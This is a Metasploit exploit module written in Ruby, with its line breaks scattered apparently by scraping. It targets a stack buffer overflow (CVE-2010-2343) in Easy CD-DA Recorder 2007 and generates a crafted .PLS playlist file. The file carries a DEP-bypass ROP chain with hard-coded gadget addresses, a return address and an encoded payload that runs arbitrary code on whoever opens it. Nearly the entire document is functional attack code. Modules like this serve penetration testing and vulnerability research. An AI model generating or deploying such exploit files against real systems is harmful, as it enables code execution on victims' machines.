require
'msf/core'
class
Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::
FILEFORMAT
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'Easy CD-DA Recorder PLS Buffer Overflow'
,
'Description'
=> %q{
This
module
exploits a stack-based buffer overflow vulnerability
in
Easy
CD
-
DA
Recorder
2007
, caused by a long string
in
a playlist entry.
By persuading the victim to open a specially-crafted .
PLS
file, a
remote attacker could execute arbitrary code on the system
or
cause
the application to crash. This
module
has been tested successfully on
Windows
XP
SP3
and
Windows
7
SP1
.
},
'License'
=>
MSF_LICENSE
,
'Author'
=>
[
'chap0'
,
'Gabor Seljan'
,
'juan vazquez'
],
'References'
=>
[
[
'BID'
,
'40631'
],
[
'EDB'
,
'13761'
],
[
'OSVDB'
,
'65256'
],
[
'CVE'
,
'2010-2343'
],
[
'URL'
,
'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048'
]
],
'DefaultOptions'
=>
{
'ExitFunction'
=>
'process'
},
'Platform'
=>
'win'
,
'Payload'
=>
{
'DisableNops'
=>
true
,
'BadChars'
=>
"\x0a\x3d"
,
'Space'
=>
2454
,
'PrependEncoder'
=>
"\x81\xc4\x54\xf2\xff\xff"
},
'Targets'
=>
[
[
'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)'
,
{
'Offset'
=>
1108
,
'Ret'
=> 0x1001b19b
}
]
],
'Privileged'
=>
false
,
'DisclosureDate'
=>
'Jun 7 2010'
,
'DefaultTarget'
=>
0
))
register_options(
[
OptString.
new
(
'FILENAME'
, [
false
,
'The file name.'
,
'msf.pls'
])
],
self
.
class
)
end
def
nops
return
make_nops(
4
).unpack(
"V"
).first
end
def
rop_nops(n =
1
)
[0x1003d55d].pack(
'V'
) * n
end
def
exploit
rop_gadgets =
[
0x1007261e,
0x0042a0e0,
0x1003bd6b,
0x10035802,
0x1005d288,
0x004030c8,
0x1005cc2d,
0x00000996,
0x1008740c,
0x00000040,
0x1001826d,
0x004364c6,
0x00404aa9,
0x100378e6,
0x0042527d,
nops,
0x00429692
].flatten.pack(
'V*'
)
sploit = rop_nops(target[
'Offset'
] /
4
)
sploit << [0x1003d55c].pack(
"V"
)
sploit << [target.ret].pack(
"V"
)
sploit << rop_nops(
22
)
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha_upper(
10000
)
print_status(
"Creating '#{datastore['FILENAME']}' file ..."
)
file_create(sploit)
end
end